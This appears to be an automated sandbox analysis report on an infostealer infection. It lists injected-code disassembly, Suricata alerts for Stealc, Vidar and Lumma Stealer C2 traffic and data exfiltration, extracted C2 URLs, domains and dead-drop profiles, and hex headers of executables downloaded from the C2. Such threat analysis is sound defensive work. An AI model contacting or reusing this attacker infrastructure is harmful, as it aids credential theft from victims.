Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	24_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	24_2_0041F862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]	24_2_0043A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	24_2_004390C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	24_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	24_2_00413888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	24_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	24_2_0041D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	24_2_00431950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-24h]	24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	24_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h	24_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	24_2_00413A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+18h]	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	24_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	24_2_0043F290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	24_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_00423BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], ax	24_2_0041DBEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_0043D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	24_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	24_2_0041E411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_004104D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+38h]	24_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	24_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h	24_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	24_2_00424640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_0041C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	24_2_00415E62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	24_2_0042866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	24_2_00403E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	24_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	24_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_00423F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	24_2_0043A796

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.7:49702
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.7:49702
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.7:56010 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49715 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49731 -> 147.45.68.138:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.7:49731
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.7:49731
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.7:49737 -> 95.164.119.162:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.7:49741
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.7:49741
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49715 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 172.67.146.35:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199761128941
Source: Malware configuration extractor	URLs: https://t.me/jamelwt

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 